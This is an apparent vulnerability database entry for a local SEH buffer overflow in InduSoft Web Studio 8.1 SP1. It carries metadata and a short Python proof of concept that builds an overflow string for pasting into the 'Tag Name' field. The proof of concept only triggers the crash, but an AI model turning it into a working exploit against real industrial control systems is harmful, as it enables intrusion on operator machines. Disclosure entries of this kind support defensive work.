Sign-up

ID

VAR-E-201809-0051


TITLE

InduSoft Web Studio 8.1 SP1 Buffer Overflow

Trust: 0.5

sources: PACKETSTORM: 149375

DESCRIPTION

InduSoft Web Studio version 8.1 suffers from a buffer overflow vulnerability.

Trust: 0.5

sources: PACKETSTORM: 149375

AFFECTED PRODUCTS

vendor:indusoftmodel:web studio sp1scope:eqversion:8.1

Trust: 0.5

sources: PACKETSTORM: 149375

EXPLOIT

# Exploit Title: InduSoft Web Studio 8.1 SP1 - 'Tag Name' Buffer Overflow (SEH)
# Discovery by: Luis Martinez
# Discovery Date: 2018-09-11
# Vendor Homepage: http://www.indusoft.com/
# Software Link: http://www.indusoft.com/Products-Downloads
# Tested Version: 8.1 SP1
# Vulnerability Type: Local Buffer Overflow (SEH Unicode)
# Tested on OS: Windows 10 Pro x64 en

# Steps to Produce the Local Buffer Overflow (SEH Unicode):
# 1.- Run python code: InduSoft_Web_Studio_8.1.py
# 2.- Open InduSoft_Web_Studio_8.1.txt and copy content to clipboard
# 3.- Open IWS v8.1 InduSoft Web Studio
# 4.- Home
# 5.- Paste ClipBoard on "Tag Name"

#!/usr/bin/env python

nSEH = "\x42\x42"
SEH = "\x43\x43"

buffer = "\x41" * 1042 + nSEH + SEH
f = open ("InduSoft_Web_Studio_8.1.txt", "w")
f.write(buffer)
f.close()

Trust: 0.5

sources: PACKETSTORM: 149375

EXPLOIT HASH

LOCAL

SOURCE

md5: f4dbd64a51d4d3407489174d0f64273e
sha-1: 6f2a32ab9256840fd5dba2777144261923d4b70e
sha-256: 1c754ae16650531859648bae6f46ef9d37e227897766b6efd0a291098b7640e9
md5: f4dbd64a51d4d3407489174d0f64273e

Trust: 0.5

sources: PACKETSTORM: 149375

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 149375

TYPE

overflow

Trust: 0.5

sources: PACKETSTORM: 149375

TAGS

tag:exploit

Trust: 0.5

tag:web

Trust: 0.5

tag:overflow

Trust: 0.5

sources: PACKETSTORM: 149375

CREDITS

Luis Martinez

Trust: 0.5

sources: PACKETSTORM: 149375

EXTERNAL IDS

db:PACKETSTORMid:149375

Trust: 0.5

sources: PACKETSTORM: 149375

SOURCES

db:PACKETSTORMid:149375

LAST UPDATE DATE

2022-07-27T09:18:16.446000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:149375date:2018-09-14T23:47:27